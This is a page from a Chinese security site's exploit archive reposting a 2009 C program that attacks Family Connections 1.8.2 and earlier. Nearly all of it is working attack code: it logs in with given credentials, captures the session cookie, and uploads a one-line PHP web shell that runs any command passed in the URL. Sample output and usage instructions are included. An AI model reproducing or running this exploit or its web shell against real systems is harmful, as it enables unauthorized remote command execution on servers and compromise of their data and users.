首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Family Connections <= 1.8.2 Remote Shell Upload Exploit
来源:drosophilaxxx@gmail.com 作者:drosophila 发布时间:2009-04-07  

/*

 Family Connections <= 1.8.2 - Remote Shell Upload Exploit
 
 Author: Salvatore "drosophila" Fresta
 
 Contact: drosophilaxxx@gmail.com
 
 Date: 3 April 2009

 The following software will upload a simple php shell.
 To execute remote commands, you must open the file
 using a browser.
 
 gcc rsue.c -o rsue
 
 ./rsue localhost /fcms/ user password

 [*] Connecting...
 [+] Connected
 [*] Send login...
 [+] Login Successful
 [+] Uploading...
 [+] Shell uploaded
 [+] Connection closed
 
 Open your browser and go to http://localhost/fcms/gallery/documents/shell.php?cmd=[commands]

*/ 

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {

 int fd;
 struct sockaddr_in sock;
 struct hostent *host;
 
 memset(&sock, 0, sizeof(sock));
 
 if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
 
 sock.sin_family = AF_INET;
 sock.sin_port = htons(port);
 
 if(!(host=gethostbyname(server))) return -1;
 
 sock.sin_addr = *((struct in_addr *)host->h_addr);
 
 if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
 
 return fd;
  
}

int socket_send(int socket, char *buffer, size_t size) {
 
 if(socket < 0) return -1;

 return write(socket, buffer, size) < 0 ? -1 : 0;
 
}

char *socket_receive(int socket, int tout) {

 fd_set input;
 int ret, byte;
 char *buffer, *tmp;
 struct timeval timeout;
 
 FD_ZERO(&input);
 FD_SET(socket, &input);
 
 if(tout > 0) {
   timeout.tv_sec  = tout;
   timeout.tv_usec = 0;
 }
 
 if(socket < 0) return NULL;
 
 if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL;
 
 while (1) {
 
  if(tout > 0)
   ret = select(socket + 1, &input, NULL, NULL, &timeout);
 else
   ret = select(socket + 1, &input, NULL, NULL, NULL);
 
 if (!ret) break;
 if (ret < 0) return NULL;
 
 if(!(tmp = (char *) calloc (1024, sizeof (char)))) return NULL;
 
 if ((byte=read(socket, tmp, 1024)) < 0) return NULL;
 
  if(!byte) break;
 
 if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen (tmp)))) return NULL;
 
 strncat(buffer, tmp, strlen(buffer)+strlen(tmp));
 
 }
 
 return buffer;
  
}

void usage(char *bn) {

 printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
   "Author: Salvatore \"drosophila\" Fresta\n\n"
   "usage: %s <server> <path> <username> <password>\n"
   "example: %s localhost /fcms/ admin 123456\n\n", bn, bn); 

}

int main(int argc, char *argv[]) {
 
 int sd;
 char code[] = "--AaB03x\r\n"
     "Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
     "Content-Type: text/plain\r\n"
     "\r\n"
     "<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n"
     "--AaB03x\r\n"
     "Content-Disposition: form-data; name=\"desc\"\r\n"
     "\r\n"
     "description\r\n"
     "--AaB03x\r\n"
     "Content-Disposition: form-data; name=\"submitadd\"\r\n"
     "\r\n"
     "Submit\r\n"
     "--AaB03x--\r\n",
  *buffer = NULL,
  *rec = NULL,
  *session = NULL;
  
 if(argc < 5) {
  usage(argv[0]);
  return -1;
 }
 
 if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char)))) {
  perror("calloc");
  return -1;
 }
 
 sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
     "Host: %s\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n"
     "Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login", argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]);
 
     
 printf("\n[*] Connecting...");
 
 if((sd = socket_connect(argv[1], 80)) < 0) {
  printf("[-] Connection failed!\n\n");
  free(buffer);
  return -1;
 }
 
 printf("\n[+] Connected"
   "\n[*] Send login...");
 
 if(socket_send(sd, buffer, strlen(buffer)) < 0) {
  printf("[-] Sending failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }
 
 if(!(rec = socket_receive(sd, 0))) {
  printf("[-] Receive failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }
 
 if(!strstr(rec, "Login Successful")) {
  printf("\n[-] Login Incorrect!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }
 
 session = strstr(rec, "PHPSESSID");
 session = strtok(session, ";");
 
 if((sd = socket_connect(argv[1], 80)) < 0) {
  printf("[-] Connection failed!\n\n");
  free(buffer);
  return -1;
 }
 
 printf("\n[+] Login Successful"
   "\n[+] Uploading...");
 
 sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n"
     "Host: %s\r\n"
     "Cookie: %s\r\n"
     "Content-type: multipart/form-data, boundary=AaB03x\r\n"
     "Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session, strlen(code), code);
 
 if(socket_send(sd, buffer, strlen(buffer)) < 0) {
  printf("[-] Sending failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }
 
 if(!(rec = socket_receive(sd, 0))) {
  printf("[-] Receive failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }
 
 if(!strstr(rec, "Uploaded Successfully")) {
  printf("\n[-] Upload failed!\n\n");
  free(buffer);
  close(sd);
  return -1;
 }
 
 free(buffer);
 close(sd);
 
 printf("\n[+] Shell uploaded"
   "\n[+] Connection closed\n\n"
   "Open your browser and go to http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1], argv[2]);
 
 return 0;
 
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
·Unreal IRCD 3.2.8.1 Remote Dow
  相关文章
·glFusion <= 1.1.2 COM_applyFil
·AdaptBB 1.0 (topic_id) SQL Inj
·IBM DB2 < 9.5 pack 3a Maliciou
·Amaya 11.1 XHTML Parser Remote
·IBM DB2 < 9.5 pack 3a Maliciou
·XBMC 8.10 GET Request Remote B
·IBM DB2 versions 9.5 prior to
·Mozilla Firefox XSL Parsing Re
·IBM DB2 versions 9.5 prior to
·iDB 0.2.5pa SVN 243 (skin) Loc
·SAP BusinessObjects Crystal Re
·UltraISO <= 9.3.3.2685 .ui Off
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved